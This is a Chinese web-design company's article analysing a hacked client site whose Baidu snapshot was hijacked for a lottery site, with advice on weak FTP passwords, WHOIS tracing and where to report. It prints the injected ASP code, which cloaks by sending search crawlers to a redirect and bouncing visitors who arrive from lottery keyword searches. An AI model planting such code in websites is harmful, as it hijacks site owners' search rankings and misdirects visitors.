域名注冊 網(wǎng)站制作
您現(xiàn)在的位置:首頁 >> SEO優(yōu)化 >> 內(nèi)容

百度快照是如何篡改(修改)的呢?

時間:2014/10/18 15:31:18 點擊:1026

摘要:前幾日,我的客戶電話說自己的百度排名沒有了,查詢下竟然百度標簽顯示的內(nèi)容是一家彩票平臺的網(wǎng)站內(nèi)容。 我知道網(wǎng)站被黑客加入了非法代碼,惡意篡改了百度快照。(截圖如下)查看“百度快照”出現(xiàn)的是一組跳...

前幾日,我的客戶電話說自己的百度排名沒有了,查詢下竟然百度標簽顯示的內(nèi)容是一家彩票平臺的網(wǎng)站內(nèi)容。 我知道網(wǎng)站被黑客加入了非法代碼,惡意篡改了百度快照。(截圖如下)

百度快照是如何篡改(修改)的呢?

查看“百度快照”出現(xiàn)的是一組跳轉(zhuǎn)網(wǎng)站的廣告內(nèi)容。我們對客戶設置的網(wǎng)站信息消失了。

百度快照是如何篡改(修改)的呢?

1、黑客是如何修改百度快照的呢?

我進行了排查,客戶的網(wǎng)站是使用asp源碼開發(fā)的。發(fā)現(xiàn)有個文件被黑客寫入了一段代碼。

路徑:Inc文件夾—SysProduct.asp文件里面最底下添加了如下代碼:

百度快照是如何篡改(修改)的呢? 

      <%
      function Getbot()
      dim s_agent
      GetBot=""
      s_agent=Request.ServerVariables("HTTP_USER_AGENT")
      if instr(1,s_agent,"googlebot",1) > 0 then
      GetBot="google"
      end if
      if instr(1,s_agent,"baiduspider",1) > 0 then
      GetBot="baidu"
      end if
      end function
      if GetBot="baidu" or GetBot="google" then
      '
      Response.Redirect "http://*********"(跳轉(zhuǎn)的網(wǎng)站,引導百度抓取的內(nèi)容)
      else
      '
      Response.Write"<scrIPt type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目標網(wǎng)站)window.adworkergo='ad_app6'}else{}</script>"
      end if
      %>
黑客設置的這串代碼導致百度爬蟲抓取網(wǎng)頁的時候,直接抓取越過客戶網(wǎng)站抓取了跳轉(zhuǎn)網(wǎng)站內(nèi)容,導致百度快照里面顯示的是別的內(nèi)容。使得客戶本來排名首頁的網(wǎng)站直接被百度屏蔽了。造成了客戶很大的損失。

2、那么黑客是如何進入后臺的呢?

黑客要進入后臺,必須知道FTP賬戶和密碼,以及IP地址。
      造成的原因有如下幾種:
      1)一方面是FTP密碼設置的時候比較簡單化,很容易被利用軟件破解掉,
      2)另一方面選擇便宜的空間也是一種隱患。因為空間IP以及用戶名是很難被知道的,除非有人提供。
3、網(wǎng)站被黑之后,你如何追查黑客的來源?

方法比較簡單,就是查詢你跳轉(zhuǎn)的目標網(wǎng)站的域名信息。一般情況下,都是一些小型的站長開發(fā)的賺錢網(wǎng)站,通過查詢域名信息你可以獲知該域名的歸屬人是誰,他有可能就是黑你網(wǎng)站的人。

如果是比較大型的網(wǎng)站利用外包的方式進行推廣,那么你也可以得知負責人,給百度或者是網(wǎng)絡警察舉報一下,該網(wǎng)站存在惡意攻擊修改內(nèi)容的行為,畢竟它也有一定得責任。

通過中國萬網(wǎng)Whois域名查詢:比如我客戶跳轉(zhuǎn)的彩票網(wǎng)站的域名信息如下:

 

百度快照是如何篡改(修改)的呢?

1)第一個是:注冊人

2)第二個是:聯(lián)系電話

3)第三個是:聯(lián)系郵箱

基本上你聯(lián)系注冊人就可以解決問題。如果對你客戶造成的損失太大的話,建議你通過以下方式進行維權(quán):

      違法和不良信息舉報中心:http://net.china.cn/
      12321網(wǎng)絡不良與垃圾信息舉報受理中心:http://www.12321.cn/
      國家互聯(lián)網(wǎng)應急中心網(wǎng)絡安全舉報中心:http://www.cert.org.cn/
      中國反釣魚網(wǎng)站聯(lián)盟認定及處理流程: http://www.cnnic.cn/
      公安部信息網(wǎng)絡安全報警網(wǎng)站:http://www.cyberpolice.cn/wfjb/
      中國掃黃打非網(wǎng):http://www.shdf.gov.cn/
      北京市公安局網(wǎng)絡違法犯罪舉報網(wǎng)站:http://www.bj.cyberpolice.cn/index.jsp
希望本篇文章對你防黑有幫助。

作者:網(wǎng)牛天下

轉(zhuǎn)載請保留原文地址: http://m.448gfe.cn/show-320.html

責編:王麗 作者:網(wǎng)牛天下 來源:網(wǎng)絡